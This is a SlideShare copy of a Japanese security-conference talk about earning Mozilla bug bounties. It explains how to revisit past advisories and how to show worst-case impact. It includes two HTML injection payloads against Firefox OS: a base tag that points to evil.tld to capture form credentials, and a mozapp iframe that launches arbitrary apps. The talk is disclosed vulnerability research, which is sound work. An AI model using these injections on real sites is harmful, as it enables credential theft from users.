Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.
Mozillaの報奨金制度で
100万円ほど稼いだ話
SECCON CTF 2014全国大会カンファレンス
2015年2月7日@東京電機大学
Welcome to the Black Hole of Bug Bounty Program –RE...
にしむねあ
Weekend Bug Hunter
Lecturer of Security Camp 2014
この3か月間で11,500ドル
2014.11 $3000 Bug 1069762
2014.12 $6000
Bug 1101158
Bug 1102204
2015.01 $2500
Bug 1065909
Bug 1106713
実は9か月間でも11,500ドル
5月 6月 7月 8月 9月 10月 11月 12月 1月5 6 7 8 9 10 11 12 1
$3000
$6000
$2500
$0 $0 $0 $0 $0 $0
実は9か月間でも11,500ドル
5月 6月 7月 8月 9月 10月 11月 12月 1月5 6 7 8 9 10 11 12 1
苦悩の6か月
苦悩の6か月で見つけた
バグ探しのメソッドを紹介します
(今後の稼ぎに支障のない範囲で)
その1
過去に学ぶ
https://www.mozilla.org/en-US/security/advisories/
• 過去の脆弱性情報から、発生した箇所と
攻撃方法を洗い出す
• 同じ攻撃を他の箇所で試してみる
• 歴史は繰り返す
https://www.mozilla.org/en-US/security/advisories/mfsa2012-53/
2012年7月 : CVE-2012-1963
CSPの違反レポートを利用して
OAuth 2.0のアクセストークンなどを盗むことができた
https://www.mozilla.org/en-US/security/advisories/mfsa2014-86/
CSPのコードをC++で書き直した際に
同じ脆弱性が再発
その2
見つけた脆弱性を
最大限に悪用する
• 発見報告して終わりじゃもったいない
• 最悪のシナリオを示すことで、
脆弱性の価値は高めることができる
深刻度がHigh以上でないと報奨金は出ない
Critical $3000
High $3000
Moderate 無し (たまに減額支給)
Low 無し
https://www.mozilla.org/en-US/security/bug-bo...
公表されていないが
Firefox OSも報奨金の対象
http://www.slideshare.net/dynamis/future-with-firefox-os
すべてWeb技術で
<s>pwn
すべてWeb技術で
そういうことか
• Firefox OSでは、権限の高いアプリには
CSPが適用される
• 任意のHTMLやCSSは注入できても
スクリプトは注入できない
スクリプトを一切使わずに
HTMLだけで悪さをする方法を考えた
攻撃① baseタグを注入
<base href=http://evil.tld>
• ベースURLを操作することにより
相対パス指定URLの通信先を変更する
• フォームの入力内容を攻撃者のサーバに
送信させるといった攻撃が可能
端末から来るHTTPリクエストを監視
Firefoxアカウントの認証画面を取りに来た
偽の認証ページを配信すれば
Firefoxアカウントの認証情報を盗める
攻撃② 特殊な<iframe>を注入
<iframe mozapp src=…>
• Firefox OSのアプリは特殊な
iframeの上で起動する
• iframeを注入することにより
任意のアプリを実行させることができる
先程の画面でFM Radioアプリが起動
HTMLインジェクション1件で
30万円貰えるボーナスゲームに
まとめ
① 過去に学ぶ
② 見つけた脆弱性を最大限に悪用する
本日紹介したメソッド
Mozillaの報奨金制度で100万円ほど稼いだ話
Mozillaの報奨金制度で100万円ほど稼いだ話
Mozillaの報奨金制度で100万円ほど稼いだ話
Mozillaの報奨金制度で100万円ほど稼いだ話
Upcoming SlideShare
Loading in …5
×

Mozillaの報奨金制度で100万円ほど稼いだ話

11,606 views

Published on

SECCON CTF 2014決勝戦・全国大会カンファレンスの発表資料です。

Published in: Technology
  • Be the first to comment

Mozillaの報奨金制度で100万円ほど稼いだ話

  1. 1. Mozillaの報奨金制度で 100万円ほど稼いだ話 SECCON CTF 2014全国大会カンファレンス 2015年2月7日@東京電機大学 Welcome to the Black Hole of Bug Bounty Program –RESOLVED FIXED-
  2. 2. にしむねあ Weekend Bug Hunter Lecturer of Security Camp 2014
  3. 3. この3か月間で11,500ドル 2014.11 $3000 Bug 1069762 2014.12 $6000 Bug 1101158 Bug 1102204 2015.01 $2500 Bug 1065909 Bug 1106713
  4. 4. 実は9か月間でも11,500ドル 5月 6月 7月 8月 9月 10月 11月 12月 1月5 6 7 8 9 10 11 12 1 $3000 $6000 $2500 $0 $0 $0 $0 $0 $0
  5. 5. 実は9か月間でも11,500ドル 5月 6月 7月 8月 9月 10月 11月 12月 1月5 6 7 8 9 10 11 12 1 苦悩の6か月
  6. 6. 苦悩の6か月で見つけた バグ探しのメソッドを紹介します (今後の稼ぎに支障のない範囲で)
  7. 7. その1 過去に学ぶ
  8. 8. https://www.mozilla.org/en-US/security/advisories/
  9. 9. • 過去の脆弱性情報から、発生した箇所と 攻撃方法を洗い出す • 同じ攻撃を他の箇所で試してみる • 歴史は繰り返す
  10. 10. https://www.mozilla.org/en-US/security/advisories/mfsa2012-53/
  11. 11. 2012年7月 : CVE-2012-1963 CSPの違反レポートを利用して OAuth 2.0のアクセストークンなどを盗むことができた
  12. 12. https://www.mozilla.org/en-US/security/advisories/mfsa2014-86/
  13. 13. CSPのコードをC++で書き直した際に 同じ脆弱性が再発
  14. 14. その2 見つけた脆弱性を 最大限に悪用する
  15. 15. • 発見報告して終わりじゃもったいない • 最悪のシナリオを示すことで、 脆弱性の価値は高めることができる
  16. 16. 深刻度がHigh以上でないと報奨金は出ない Critical $3000 High $3000 Moderate 無し (たまに減額支給) Low 無し https://www.mozilla.org/en-US/security/bug-bounty/
  17. 17. 公表されていないが Firefox OSも報奨金の対象
  18. 18. http://www.slideshare.net/dynamis/future-with-firefox-os
  19. 19. すべてWeb技術で <s>pwn
  20. 20. すべてWeb技術で
  21. 21. そういうことか
  22. 22. • Firefox OSでは、権限の高いアプリには CSPが適用される • 任意のHTMLやCSSは注入できても スクリプトは注入できない
  23. 23. スクリプトを一切使わずに HTMLだけで悪さをする方法を考えた
  24. 24. 攻撃① baseタグを注入 <base href=http://evil.tld>
  25. 25. • ベースURLを操作することにより 相対パス指定URLの通信先を変更する • フォームの入力内容を攻撃者のサーバに 送信させるといった攻撃が可能
  26. 26. 端末から来るHTTPリクエストを監視
  27. 27. Firefoxアカウントの認証画面を取りに来た
  28. 28. 偽の認証ページを配信すれば Firefoxアカウントの認証情報を盗める
  29. 29. 攻撃② 特殊な<iframe>を注入 <iframe mozapp src=…>
  30. 30. • Firefox OSのアプリは特殊な iframeの上で起動する • iframeを注入することにより 任意のアプリを実行させることができる
  31. 31. 先程の画面でFM Radioアプリが起動
  32. 32. HTMLインジェクション1件で 30万円貰えるボーナスゲームに
  33. 33. まとめ
  34. 34. ① 過去に学ぶ ② 見つけた脆弱性を最大限に悪用する 本日紹介したメソッド

×